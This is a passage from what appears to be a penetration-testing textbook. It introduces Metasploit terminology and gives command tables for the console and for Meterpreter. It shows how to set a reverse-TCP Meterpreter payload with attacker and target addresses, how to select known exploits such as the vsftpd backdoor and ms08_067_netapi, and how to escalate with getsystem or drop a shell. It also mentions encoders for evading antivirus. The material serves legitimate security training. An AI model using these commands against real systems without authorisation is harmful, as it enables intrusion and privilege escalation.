After setting up Kali Linux, we are now ready to perform our first penetration test with Metasploit. However, before we start the test, let's recall some of the essential functions and terminologies used in the Metasploit framework.
Conducting a penetration test with Metasploit
Recalling the basics of Metasploit
After we run Metasploit, we can list all the useful commands available in the framework by typing help or ? in the Metasploit console. Let's recall the basic terms used in Metasploit, which are as follows:
- Exploits: This is a piece of code that, when executed, will exploit the vulnerability of the target.
- Payload: This is a piece of code that runs at the target after successful exploitation. It defines the actions we want to perform on the target system.
- Auxiliary: These are modules that provide additional functionalities such as scanning, fuzzing, sniffing, and much more.
- Encoders: Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall.
- Meterpreter: Meterpreter is a payload that uses in-memory DLL injection stagers. It provides a variety of functions to perform at the target, which makes it a popular choice.
Now, let's recall some of the basic commands of Metasploit that we will use in this chapter. Let's see what they are supposed to do:
|
Command |
Usage |
Example |
|
use [Auxiliary/Exploit/Payload/Encoder] |
To select a particular module to start working with |
msf>use exploit/unix/ftp/vsftpd_234_backdoor msf>use auxiliary/scanner/portscan/tcp |
|
show [exploits/payloads/encoder/auxiliary/options] |
To see the list of available modules of a particular type |
msf>show payloads msf> show options |
|
set [options/payload] |
To set a value to a particular object |
msf>set payload windows/meterpreter/reverse_tcp msf>set LHOST 192.168.10.118 msf> set RHOST 192.168.10.112 msf> set LPORT 4444 msf> set RPORT 8080 |
|
setg [options/payload] |
To set a value to a particular object globally, so the values do not change when a module is switched on |
msf>setg RHOST 192.168.10.112 |
|
run |
To launch an auxiliary module after all the required options are set |
msf>run |
|
exploit |
To launch an exploit |
msf>exploit |
|
back |
To unselect a module and move back |
msf(ms08_067_netapi)>back msf> |
|
Info |
To list the information related to a particular exploit/module/auxiliary |
msf>info exploit/windows/smb/ms08_067_netapi msf(ms08_067_netapi)>info |
|
Search |
To find a particular module |
msf>search hfs |
|
check |
To check whether a particular target is vulnerable to the exploit or not |
msf>check |
|
Sessions |
To list the available sessions |
msf>sessions [session number] |
Let's have a look at the basic Meterpreter commands as well:
|
Meterpreter commands |
Usage |
Example |
|
sysinfo |
To list system information of the compromised host |
meterpreter>sysinfo |
|
ifconfig |
To list the network interfaces on the compromised host |
meterpreter>ifconfig meterpreter>ipconfig (Windows) |
|
arp |
List of IP and MAC addresses of hosts connected to the target |
meterpreter>arp |
|
background |
To send an active session to the background |
meterpreter>background |
|
shell |
To drop a cmd shell on the target |
meterpreter>shell |
|
getuid |
To get the current user's details |
meterpreter>getuid |
|
getsystem |
To escalate privileges and gain SYSTEM access |
meterpreter>getsystem |
|
getpid |
To gain the process ID of the meterpreter access |
meterpreter>getpid |
|
ps |
To list all the processes running on the target |
meterpreter>ps |
Since we have now recalled the basics of Metasploit commands, let's have a look at the benefits of using Metasploit over traditional tools and scripts in the next section.
If you are using Metasploit for the very first time, refer to https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/ for more information on basic commands.